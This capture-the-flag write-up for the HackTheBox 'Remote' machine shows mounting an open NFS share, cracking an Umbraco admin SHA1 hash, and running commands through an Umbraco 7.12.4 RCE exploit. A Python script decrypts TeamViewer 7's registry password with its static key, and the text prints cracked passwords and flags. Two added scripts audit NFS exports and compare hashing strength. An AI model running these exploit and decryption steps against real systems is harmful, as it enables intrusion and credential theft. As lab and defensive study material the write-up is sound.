HackTheBox - Remote
Summary
| Remote | |
|---|---|
| Difficulty: | Easy |
| OS: | Windows |
| Release date: | 21-03-2020 |

Remote was an easy Windows machine that required mounting an NFS drive, after which cracking a hashed password granted access to the Umbraco admin panel. Exploitation of a CVE in the installed Umbraco version provided foothold. I achieved root access by identifying a vulnerable version of TeamViewer and extracting credentials from the configuration.
Foothold
An Nmap scan revealed a number of open ports. Some interesting ones are 21 (FTP), 80 (HTTP), and 2049 (NFS).
mick@kali:~/Documents/HackTheBox/Remote$ nmap -sV -sC -oN nmap_remote 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-28 13:52 CEST
Stats: 0:00:55 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.89% done; ETC: 13:53 (0:00:00 remaining)
Nmap scan report for 10.10.10.180
Host is up (0.027s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 3m55s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-05-28T11:57:29
|_ start_date: N/A
The ‘/Contact’ page on the website contained an interesting link reading ‘Go to back office and install forms’.
Unfortunately, logging in with default/trivial credentials failed. The Nmap scan from earlier also found port 2049 open, which is used for NFS. I checked which folders were exported and mountable with the showmount command.
mick@kali:~/Documents/HackTheBox/Remote$ showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
The folder site_backups was available to everyone so I mounted it.
mick@kali:~/Documents/HackTheBox/Remote$ mkdir /tmp/site_backups
mick@kali:~/Documents/HackTheBox/Remote$ sudo mount -t nfs 10.10.10.180:/site_backups /tmp/site_backups
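The export list above is exactly what an administrator should be auditing for: an export that any client may mount. The following script is an added example, not part of the original writeup; it parses `showmount -e` output, flags exports whose client list is unrestricted, and runs on a constructed sample that combines the page's own export line with two invented ones (a client-restricted export and the Linux-style `*` wildcard).

```python
"""Flag world-mountable exports in `showmount -e` output.

Added example, not part of the original writeup. The first export line in
the sample is the page's own showmount output; the other two are constructed
to show a client-restricted export and the Linux-style `*` wildcard.
"""
from dataclasses import dataclass
from typing import List

# Constructed sample: the page's export plus two invented lines.
SAMPLE_SHOWMOUNT = """Export list for 10.10.10.180:
/site_backups (everyone)
/srv/restricted 10.0.0.0/24,10.0.1.5
/srv/wildcard   *
"""

# Client entries that mean "no restriction": Windows Server for NFS prints
# "(everyone)", Linux nfs-utils prints "*".
OPEN_CLIENT_SPECS = {"everyone", "*"}


@dataclass
class Export:
    path: str
    clients: List[str]

    @property
    def world_mountable(self) -> bool:
        return any(c in OPEN_CLIENT_SPECS for c in self.clients)


def parse_showmount(text: str) -> List[Export]:
    """Parse `showmount -e` output into Export records, skipping the header."""
    exports = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Export list for"):
            continue
        parts = line.split(None, 1)
        path = parts[0]
        client_field = parts[1].strip("()") if len(parts) > 1 else ""
        clients = [c.strip() for c in client_field.split(",") if c.strip()]
        exports.append(Export(path, clients))
    return exports


def open_exports(text: str) -> List[str]:
    """Paths that any host on the network can mount; each one should be
    justified or restricted to the hosts that actually need it."""
    return [e.path for e in parse_showmount(text) if e.world_mountable]


if __name__ == "__main__":
    for e in parse_showmount(SAMPLE_SHOWMOUNT):
        state = "OPEN" if e.world_mountable else "restricted"
        print(f"{e.path:<18} {state:<10} {','.join(e.clients)}")
```

Run it against `showmount -e <server>` output piped from each NFS server in scope; on this box it reports `/site_backups` as open, which is the whole reason the site backup (and the Umbraco database inside it) was readable without credentials.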
Listing the mounted folder shows several interesting files.
mick@kali:/tmp/site_backups$ ls -la
total 123
drwx------ 2 nobody 4294967294 4096 Feb 23 19:35 .
drwxrwxrwt 18 root root 4096 May 28 14:50 ..
drwx------ 2 nobody 4294967294 64 Feb 20 18:16 App_Browsers
drwx------ 2 nobody 4294967294 4096 Feb 20 18:17 App_Data
drwx------ 2 nobody 4294967294 4096 Feb 20 18:16 App_Plugins
drwx------ 2 nobody 4294967294 64 Feb 20 18:16 aspnet_client
drwx------ 2 nobody 4294967294 49152 Feb 20 18:16 bin
drwx------ 2 nobody 4294967294 8192 Feb 20 18:16 Config
drwx------ 2 nobody 4294967294 64 Feb 20 18:16 css
-rwx------ 1 nobody 4294967294 152 Nov 1 2018 default.aspx
-rwx------ 1 nobody 4294967294 89 Nov 1 2018 Global.asax
drwx------ 2 nobody 4294967294 4096 Feb 20 18:16 Media
drwx------ 2 nobody 4294967294 64 Feb 20 18:16 scripts
drwx------ 2 nobody 4294967294 8192 Feb 20 18:16 Umbraco
drwx------ 2 nobody 4294967294 4096 Feb 20 18:16 Umbraco_Client
drwx------ 2 nobody 4294967294 4096 Feb 20 18:16 Views
-rwx------ 1 nobody 4294967294 28539 Feb 20 06:57 Web.config
Inside the folder App_Data I found a file called “Umbraco.sdf”.
mick@kali:/tmp/site_backups/App_Data$ ls
total 1977
drwx------ 2 nobody 4294967294 4096 Feb 20 18:17 .
drwx------ 2 nobody 4294967294 4096 Feb 23 19:35 ..
drwx------ 2 nobody 4294967294 64 Feb 20 18:16 cache
drwx------ 2 nobody 4294967294 4096 Feb 20 18:16 Logs
drwx------ 2 nobody 4294967294 4096 Feb 20 18:16 Models
drwx------ 2 nobody 4294967294 64 Feb 20 18:16 packages
drwx------ 2 nobody 4294967294 4096 Feb 20 18:16 TEMP
-rwx------ 1 nobody 4294967294 36832 Feb 20 07:59 umbraco.config
-rwx------ 1 nobody 4294967294 1965978 Feb 20 07:05 Umbraco.sdf
SDF stands for Standard Database Format and is used to transfer data between database applications. Running the strings command on this file revealed several usernames and password hashes. The most interesting result was what appears to be a SHA1 hash for the admin user.
mick@kali:~/Documents/HackTheBox/Remote$ strings Umbraco.sdf
...
[email protected]{"hashAlgorithm":"SHA1"}
...
This password hash was easily cracked with john.
mick@kali:~/Documents/HackTheBox/Remote$ john -format:Raw-SHA1 -wordlist:/usr/share/wordlists/rockyou.txt admin_hash
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
baconandcheese (?)
1g 0:00:00:01 DONE (2020-05-30 21:18) 0.6451g/s 6337Kp/s 6337Kc/s 6337KC/s baconandchipies1..bacon918
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed
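The hash fell in about a second because it is an unsalted SHA1 digest: one cheap hash per guess and no per-user salt. The script below is an added example, not part of the original writeup; it runs the same dictionary attack against a raw SHA1 digest and against a salted PBKDF2-HMAC-SHA256 hash, and measures how many SHA1 guesses fit in the time of a single PBKDF2 guess. The secret, salt and wordlist are constructed for the demonstration; only the algorithm choice (raw SHA1, as the `"hashAlgorithm":"SHA1"` field in Umbraco.sdf reports) comes from the page.

```python
"""Why an unsalted SHA1 hash falls to a wordlist in seconds, and what the
same wordlist costs against a salted, iterated hash.

Added example, not part of the original writeup. The secret, salt and
wordlist below are constructed; only the algorithm choice (raw SHA1) comes
from the page.
"""
import hashlib
import time
from typing import Iterable, Optional

# Constructed stand-in for rockyou.txt.
WORDLIST = ["password", "letmein", "bacon", "baconandchips", "correcthorse", "winter2020"]
# Constructed 16-byte salt for the PBKDF2 side of the comparison.
DEMO_SALT = b"\x8f\x02" * 8


def sha1_hex(password: str) -> str:
    """Unsalted SHA1 in hex, the form john's Raw-SHA1 mode consumes."""
    return hashlib.sha1(password.encode()).hexdigest()


def crack_raw_sha1(target_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack on an unsalted SHA1 digest.

    One cheap hash per guess and no salt, so a precomputed table works and
    every user who picked the same password shares the same digest.
    """
    target = target_hex.lower()
    for guess in wordlist:
        if sha1_hex(guess) == target:
            return guess
    return None


def pbkdf2_hash(password: str, salt: bytes, iterations: int = 100_000) -> bytes:
    """Salted, iterated hash (PBKDF2-HMAC-SHA256), the shape a membership
    provider should store: the per-user salt defeats precomputation and the
    iteration count multiplies the cost of every single guess."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def crack_pbkdf2(target: bytes, salt: bytes, wordlist: Iterable[str],
                 iterations: int = 100_000) -> Optional[str]:
    """Same dictionary attack against PBKDF2. It still succeeds when the
    password is in the list, but each guess now costs `iterations` HMACs."""
    for guess in wordlist:
        if pbkdf2_hash(guess, salt, iterations) == target:
            return guess
    return None


def cost_ratio(iterations: int = 100_000, sha1_samples: int = 20_000) -> float:
    """How many raw SHA1 guesses fit in the time of one PBKDF2 guess here."""
    t0 = time.perf_counter()
    for i in range(sha1_samples):
        hashlib.sha1(b"guess%d" % i).digest()
    sha1_per_guess = (time.perf_counter() - t0) / sha1_samples
    t0 = time.perf_counter()
    pbkdf2_hash("guess", DEMO_SALT, iterations)
    return (time.perf_counter() - t0) / sha1_per_guess


if __name__ == "__main__":
    secret = "baconandchips"  # constructed; deliberately present in WORDLIST
    print("raw SHA1 cracked:", crack_raw_sha1(sha1_hex(secret), WORDLIST))
    target = pbkdf2_hash(secret, DEMO_SALT)
    print("PBKDF2 cracked:", crack_pbkdf2(target, DEMO_SALT, WORDLIST))
    print(f"one PBKDF2 guess costs about {cost_ratio():,.0f} raw SHA1 guesses")
```

The ratio printed at the end is the practical difference: a wordlist that takes a second against raw SHA1 takes hours or days against the iterated hash, and a leaked backup like `Umbraco.sdf` then buys an attacker far less. The salt also means two accounts with the same password no longer share a digest, so one cracked hash no longer reveals the others.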
This password provided me with access to the Umbraco dashboard.
By clicking on the question mark on the bottom left I learned that this is version 7.12.4 of Umbraco.
After some research I found this RCE affecting Umbraco 7.12.4. I found multiple PoCs, but this one appeared to be the easiest to use. With this exploit I achieved a foothold, and with that also user access.
mick@kali:~/Documents/HackTheBox/Remote$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c whoami
iis apppool\defaultapppool
mick@kali:~/Documents/HackTheBox/Remote$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a '-NoProfile -Command ls ../../../Users'
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/19/2020 3:12 PM .NET v2.0
d----- 2/19/2020 3:12 PM .NET v2.0 Classic
d----- 2/19/2020 3:12 PM .NET v4.5
d----- 2/19/2020 3:12 PM .NET v4.5 Classic
d----- 5/30/2020 2:25 PM Administrator
d----- 2/19/2020 3:12 PM Classic .NET AppPool
d-r--- 5/30/2020 3:10 PM Public
mick@kali:~/Documents/HackTheBox/Remote$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a '-NoProfile -Command ls ../../../Users/Public'
Directory: C:\Users\Public
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 2/19/2020 3:03 PM Documents
d-r--- 9/15/2018 3:19 AM Downloads
d-r--- 5/30/2020 2:37 PM Music
d-r--- 9/15/2018 3:19 AM Pictures
d-r--- 9/15/2018 3:19 AM Videos
-a---- 5/30/2020 3:10 PM 73802 ejecutame.exe
-a---- 5/30/2020 2:33 PM 562841 PowerUp.ps1
-ar--- 5/30/2020 2:26 PM 34 user.txt
mick@kali:~/Documents/HackTheBox/Remote$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a '-NoProfile -Command Get-Content ../../../Users/Public/user.txt'
2336f87a1c6b286797a46b46b4b9d470
Root access
After some additional enumeration I discovered a running TeamViewer 7 installation.
mick@kali:~/Documents/HackTheBox/Remote$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "net start"
These Windows services are started:
...
Task Scheduler
TCP/IP NetBIOS Helper
TeamViewer 7
Themes
...
The command completed successfully.
According to this Metasploit module, TeamViewer stores the encrypted password in the registry. It is trivial to decrypt this password as it is encrypted with a static key. I started by extracting the encrypted password from the registry, using the corresponding registry key I found in the Metasploit module. The encrypted value is stored in the property ‘SecurityPasswordAES’.
mick@kali:~/Documents/HackTheBox/Remote$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "reg query HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\TeamViewer\\\\Version7"
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7
StartMenuGroup REG_SZ TeamViewer 7
InstallationDate REG_SZ 2020-02-20
InstallationDirectory REG_SZ C:\Program Files (x86)\TeamViewer\Version7
Always_Online REG_DWORD 0x1
Security_ActivateDirectIn REG_DWORD 0x0
Version REG_SZ 7.0.43148
ClientIC REG_DWORD 0x11f25831
PK REG_BINARY BFAD2AEDB6C89AE0A0FD0501A0C5B9A5C0D957A4CC57C1884C84B6873EA03C069CF06195829821E28DFC2AAD372665339488DD1A8C85CDA8B19D0A5A2958D86476D82CA0F2128395673BA5A39F2B875B060D4D52BE75DB2B6C91EDB28E90DF7F2F3FBE6D95A07488AE934CC01DB8311176AEC7AC367AB4332ABD048DBFC2EF5E9ECC1333FC5F5B9E2A13D4F22E90EE509E5D7AF4935B8538BE4A606AB06FE8CC657930A24A71D1E30AE2188E0E0214C8F58CD2D5B43A52549F0730376DD3AE1DB66D1E0EBB0CF1CB0AA7F133148D1B5459C95A24DDEE43A76623759017F21A1BC8AFCD1F56FD0CABB340C9B99EE3828577371B7ADA9A8F967A32ADF6CF062B00026C66F8061D5CFF89A53EAE510620BC822BC6CC615D4DE093BC0CA8F5785131B75010EE5F9B6C228E650CA89697D07E51DBA40BF6FC3B2F2E30BF6F1C01F1BC2386FA226FFFA2BE25AE33FA16A2699A1124D9133F18B50F4DB6EDA2D23C2B949D6D2995229BC03507A62FCDAD55741B29084BD9B176CFAEDAAA9D48CBAF2C192A0875EC748478E51156CCDD143152125AE7D05177083F406703ED44DCACCD48400DD88A568520930BED69FCD672B15CD3646F8621BBC35391EAADBEDD04758EE8FC887BACE6D8B59F61A5783D884DBE362E2AC6EAC0671B6B5116345043257C537D27A8346530F8B7F5E0EBACE9B840E716197D4A0C3D68CFD2126E8245B01E62B4CE597AA3E2074C8AB1A4583B04DBB13F13EB54E64B850742A8E3E8C2FAC0B9B0CF28D71DD41F67C773A19D7B1A2D0A257A4D42FC6214AB870710D5E841CBAFCD05EF13B372F36BF7601F55D98ED054ED0F321AEBA5F91D390FF0E8E5815E6272BA4ABB3C85CF4A8B07851903F73317C0BC77FA12A194BB75999319222516
LastMACUsed REG_MULTI_SZ \0005056B91447
MIDInitiativeGUID REG_SZ {514ed376-a4ee-4507-a28b-484604ed0ba0}
MIDVersion REG_DWORD 0x1
ClientID REG_DWORD 0x6972e4aa
CUse REG_DWORD 0x1
LastUpdateCheck REG_DWORD 0x5e72893c
UsageEnvironmentBackup REG_DWORD 0x1
SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B
MultiPwdMgmtIDs REG_MULTI_SZ admin
MultiPwdMgmtPWDs REG_MULTI_SZ 357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77
Security_PasswordStrength REG_DWORD 0x3
To decrypt this password I needed the encryption key first. After searching around, this blog post provided me with the encryption key 0602000000a400005253413100040000, the IV 0100010067244F436E6762F25EA8D704, and the correct cipher mode, CBC. I wrote a Python script to decrypt the password and ultimately recovered the Administrator password.
from binascii import unhexlify
from Crypto.Cipher import AES  # pycryptodome

# Static key and IV that TeamViewer 7 uses for SecurityPasswordAES (from the blog post above)
key = unhexlify("0602000000a400005253413100040000")
IV = unhexlify("0100010067244F436E6762F25EA8D704")
# The SecurityPasswordAES value read from the registry
ciphertext = unhexlify("FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B")

aes = AES.new(key, AES.MODE_CBC, IV)
decrypted = aes.decrypt(ciphertext)
# The plaintext is a UTF-16LE string, zero-padded to the AES block size
password = decrypted.decode("utf-16-le").rstrip("\x00")
print("Decrypted password: " + password)
The decrypted password was ‘!R3m0te!’.
mick@kali:~/Documents/HackTheBox/Remote$ python decryption.py
Decrypted password: !R3m0te!
This password provided me with Administrator access.
mick@kali:~$ smbclient \\\\10.10.10.180\\C$ -U Administrator
Enter WORKGROUP\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> ls
$Recycle.Bin DHS 0 Wed Feb 19 21:04:06 2020
._nfs DHS 0 Mon Jun 1 18:23:02 2020
Config.Msi DHS 0 Thu Feb 27 13:23:44 2020
Documents and Settings DHS 0 Wed Feb 19 21:03:20 2020
ftp_transfer D 0 Thu Feb 20 07:13:36 2020
inetpub D 0 Wed Feb 19 21:11:33 2020
Microsoft D 0 Thu Feb 20 05:09:44 2020
pagefile.sys AHS 738197504 Mon Jun 1 17:22:04 2020
PerfLogs D 0 Sat Sep 15 09:19:00 2018
Program Files DR 0 Sun Feb 23 20:19:40 2020
Program Files (x86) D 0 Sun Feb 23 20:19:45 2020
ProgramData DH 0 Wed Feb 19 22:16:04 2020
Recovery DHS 0 Wed Feb 19 21:03:20 2020
site_backups D 0 Mon Jun 1 17:22:16 2020
System Volume Information DHS 0 Thu Feb 20 07:43:40 2020
Users DR 0 Wed Feb 19 21:12:25 2020
Windows D 0 Thu Feb 20 06:52:33 2020
7779839 blocks of size 4096. 4734785 blocks available
smb: \> cd Users\Administrator\Desktop
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \Users\Administrator\Desktop\> exit
mick@kali:~/Documents/HackTheBox/Remote$ cat root.txt
18d01028beff9ae21624b97337c0cf26